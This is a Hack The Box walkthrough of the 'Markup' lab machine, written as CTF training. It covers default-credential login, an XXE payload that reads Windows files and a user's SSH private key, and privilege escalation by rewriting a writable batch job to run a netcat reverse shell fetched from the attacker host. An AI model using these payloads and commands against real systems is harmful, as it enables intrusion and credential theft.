Markup
Overview
Markup is a vulnerable machine from Hack the Box that requires some web app enumeration and using an xxe injection to read files. The foothold is accomplished after gaining access to a login page, use xxe injection to read files on the host and steal file contents to get onto the host over ssh. The privilege escalation is accomplished through enumerating the host for interesting files that execute as the administrator, and modifying the file to execute a new command in order to get a shell back.
Nmap Scan
sudo nmap -sS <target ip> -vvv
- 22/tcp open ssh syn-ack ttl 127
- OpenSSH for_Windows_8.1
- 80/tcp open http syn-ack ttl 127
- Apache httpd 2.4.41 ((Win64) OpenSSL/1.1.1c PHP/7.2.28)
- 443/tcp open https syn-ack ttl 127
Basic Enumeration
Going over to the website, we can sign in with some bad default credentails. While admin:admin doesn’t work, admin:password does allow us access.
- Looking around the web site, we do have a couple places where we could try to pass user input to try cross-site scripting, sql injection, or xxe injection.
- We can use BurpSuite to do some testing.
- Send our test response to repeater.
- we can see if we can try to read the etc/hosts file on windows
C:\windows\system32\drivers\etc\hosts
- we found a way to read
win.inifile as well.
1
<!DOCTYPE root [<!ENTITY ext SYSTEM 'file:///c:/windows/win.ini'>]>
We also had to change our item parameter to match the Entity type (since this is ext, we have to change item to be &ext;).
Foothold
Now, we can try to just guess around for files, so it may helpful for us to check around the site page for more information. Checking the web page source code, we see a user Daniel who modified the web page.
- Since we know that ssh is on this host, we can try to navigate over to the user’s ssh folder and get their key.
C:/users/daniel/.ssh/id_rsa- Grab that key using the above xxe injection.
- Put it in an id_rsa file on our attacker machine.
chmod 400 id_rsa
Now we try to connect to the machine over ssh.
ssh -i id_rsa daniel@<target ip>
We can now read the user.txt.
Local Enumeration
Checking around the file system, there is an interesting file path Log-Management. There is a file here, job.bat. Checking the file contents, we can see this file is set up to execute the process wevtutil.exe:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
@echo off
FOR /F "tokens=1,2*" %%V IN ('bcdedit') DO SET adminTest=%%V
IF (%adminTest%)==(Access) goto noAdmin
for /F "tokens=*" %%G in ('wevtutil.exe el') DO (call :do_clear "%%G")
echo.
echo Event Logs have been cleared!
goto theEnd
:do_clear
wevtutil.exe cl %1
goto :eof
:noAdmin
echo You must run this script as an Administrator!
:theEnd
exit
Privilege Escalation
Using icacls.exe, we can check to see if we have permissions to modify the file. For our permissions, we see an (F), meaning we have full control. We can modify this file and have it execute either something else, or add what we to have this file run.
- We can run the following to modify what this file executes:
echo C:\Log-Management\nc64.exe -e cmd.exe {attacker_IP} {port} > C:\Log-Management\job.bat- Do not run the above in powershell.
- Pull the Netcat over to the victim:
wget http://10.10.14.60:8000/nc64.exe -outfile nc64.exe- Run the above in powershell.
As a scheduled task, this batch job is schduled to run. We can set up netcat on our attacker machine and wait for the connection back. However, while doing this, this seems to not work in this manner. We did remember that we have full control over the file. So, instead of waiting for the scheduled task to run, we can just for the file to execute.
- We run the batch file, and get a shell back as
nt authority\system. We can now readroot.txt.
